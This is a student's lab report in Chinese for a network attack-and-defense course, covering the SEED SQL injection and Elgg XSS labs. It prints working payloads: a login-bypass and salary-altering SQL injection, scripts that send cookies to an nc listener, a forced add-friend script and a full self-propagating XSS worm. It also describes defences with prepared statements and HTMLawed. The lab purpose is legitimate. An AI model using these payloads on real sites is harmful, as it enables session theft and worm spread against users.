20232937文兆宇 2023-2024-2 《网络攻防实践》实践十报告

20232937文兆宇 2023-2024-2 《网络攻防实践》实践十报告

1.实践内容

一、SEED SQL注入攻击与防御实验

我们已经创建了一个Web应用程序，并将其托管在 www.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色：管理员是特权角色，可以管理每个员工的个人资料信息。员工是一般角色，可以查看或更新自己的个人资料信息。完成以下任务：

熟悉SQL语句： 我们已经创建了一个名为Users的数据库，其中包含一个名为creditential的表。该表存储了每个员工的个人信息（例如，eid，密码，薪水，ssn等）。在此任务中，您需要使用数据库来熟悉SQL查询。

对SELECT语句的SQL注入攻击：上述Web应用存在SQL输入漏洞，任务是在不知道密码的情况下登陆该Web应用程序。

对UPDATE语句的SQL注入攻击：通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。

SQL对抗：修复上述SQL注入攻击漏洞。

二、SEED XSS跨站脚本攻击实验(Elgg)

为了演示攻击者可以利用XSS漏洞做什么，我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中，学生需要利用此漏洞对经过修改的Elgg发起XSS攻击，攻击的最终目的是在用户之间传播XSS蠕虫，这样，无论是谁查看的受感染用户个人资料都将被感染。

发布恶意消息，显示警报窗口：在您的Elgg配置文件中嵌入一个JavaScript程序，以便当另一个用户查看您的配置文件时，将执行JavaScript程序并显示一个警报窗口。

弹窗显示cookie信息：将cookie信息显示。

窃取受害者的cookies：将cookie发送给攻击者。

成为受害者的朋友：使用js程序加受害者为朋友，无需受害者干预，使用相关的工具了解Elgg加好友的过程。

修改受害者的信息：使用js程序使得受害者在访问Alice的页面时，资料无需干预却被修改。

编写XSS蠕虫。

对抗XSS攻击。

2.实践过程

用户名（wenzhoayu）

2.1 sql

2.1.1 查看数据库

首先熟悉一下sql的命令和查看一下数据库

mysql -u root -p 
seedubuntu

切换到users数据库

use Users

查看库里有什么表

show tables

查看表里有什么数据,发现有一堆用户数据

select * from credential;

2.1.2 登录注入

访问网站，准备sql注入，随便输入一下，没有账号或者密码错误都是一个回显，这里简单根据上述的表拿Admin来做实验，直接先尝试用单引号注入。直接就注入成功了。

http://www.seedlabsqlinjection.com/

2.1.3 更改信息

admin没有信息，这里先用老办法写换到alice
这里可以修改信息
这块看看有没有sql注入可以修改alice的工资，可以发现已经修改成功了

', salary='1000' where Name='Alice';#

2.1.4 sql注入保护

第一个登录，查看源码，然后添加保护，防止单引号注入

vim /var/www/SQLInjection/unsafe_home.php

更改后

$sql = $conn->prepare("SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password FROM credential WHERE name= ? and Password= ?;");
$sql->bind_param("ss", $input_uname, $hashed_pwd);

第二个编辑,也是同样的道理

vim /var/www/SQLInjection/unsafe_edit_backend.php

更改后

if($input_pwd!=''){
// In case password field is not empty.
$hashed_pwd = sha1($input_pwd);
//Update the password stored in the session.
$_SESSION['pwd']=$hashed_pwd;
$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,Password=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("sssss", $input_nickname, $input_email, $input_address, $hashed_pwd, $input_phonenumber);
}else{
// if passowrd field is empty.
$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("ssss", $input_nickname, $input_email, $input_address, $input_phonenumber);
}

2.2 xss

2.2.1 测试xss

访问网站，用户名为Alice，密码为seedalice

http://www.xsslabelgg.com/

测试消息框里面有没有xss，保存后发现有弹窗

<script>alert("1");</script>	

2.2.2 泄露cookie

泄露cookie的命令，把它放入同样的地方，发现泄露成功。

<script> alert(document.cookie);</script>

利用浏览器加载图片来窃取cookie到本地，输入命令到原来的位置，并且开始监听。保存后，刷新网站就可以在本地抓到cookie

<script>
  document.write('<img src=http://127.0.0.1:5555?c=' + escape(document.cookie) + '>');
</script>

nc -l 5555 -v

2.2.3 成为受害者的朋友

假设我们是alice，现在需要添加bob为好友，在不经过bob的同意下完成此操作。
首先查看添加好友需要哪些参数

http://www.xsslabelgg.com/action/friends/add?friend=45&__elgg_ts=1715891231&__elgg_token=wkj7SF8ebMWQ2nVcXA4cQA&__elgg_ts=1715891231&__elgg_token=wkj7SF8ebMWQ2nVcXA4cQA

这里有三个参数

用户id friend
时间戳 ts
token 

在对话框中填写我们的攻击代码，这意味着当bob访问我们的界面后，会自动执行添加alice为好友的操作

<script type="text/javascript">
window.onload = function () {
   var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
   var token="&__elgg_token="+elgg.security.token.__elgg_token;
   var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=44"+ts+token;
    
   var Ajax=null;    
   Ajax=new XMLHttpRequest();
   Ajax.open("GET",sendurl,true);
   Ajax.setRequestHeader("Host","www.xsslabelgg.com");
   Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
   Ajax.send();
}
</script>

登录bob的用户，首先看见自己没有alice的好友，在访问alice后发现就自动添加好友了

2.2.4编写蠕虫

蠕虫代码如下，写入alice的对话框里

<script id="worm" type="text/javascript">
    window.onload = function(){
        var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
        var jsCode = document.getElementById("worm").innerHTML;
        var tailTag = "</" + "script>"; 
        var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);
 
        var userName=elgg.session.user.name;
        var guid="&guid="+elgg.session.user.guid;
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;
 
        //Construct the content of your url.
        var content= token + ts + "&name=" + userName + "&description=<p>this page had been changed by xss attack again "+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
        var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
        alert(content)
 
        var aliceGuid=44;
 
        if(elgg.session.user.guid!=aliceGuid){
            var Ajax=null;
            Ajax=new XMLHttpRequest();
            Ajax.open("POST",sendurl,true);
            Ajax.setRequestHeader("Host","www.xsslabelgg.com");
            Ajax.setRequestHeader("Content-Type",
            "application/x-www-form-urlencoded");
            Ajax.send(content);
        }
    }
</script>

用bob访问alice，观察bob主页的变化 about me两次改变

此时登录admin用户，访问bob，观察变化

2.2.5 对抗xss

登录admin，激活HTMLawed插件，激活后观察自己的主页，发现代码已经无法解析，只能作为txt显示，成功抵抗。

3.学习中遇到的问题及解决

• 问题1：靶机链接不上桥接网络
• 问题1解决方案：重新配置该虚拟机的ip地址，并重启，可以成功连接到网络

4.实践总结

通过这次学习，我学会了sql注入和xss攻击，了解了它们的相关原理，并学习了如何修补这些漏洞，尤其是xss漏洞，窃取别人的信息，并利用这些信息进行攻击，十分有用。希望在后续的实验中，也可以利用这些漏洞完成自己的实验。

参考资料

• 《Java程序设计与数据结构教程（第二版）》
• 《Java程序设计与数据结构教程（第二版）》学习指导
• …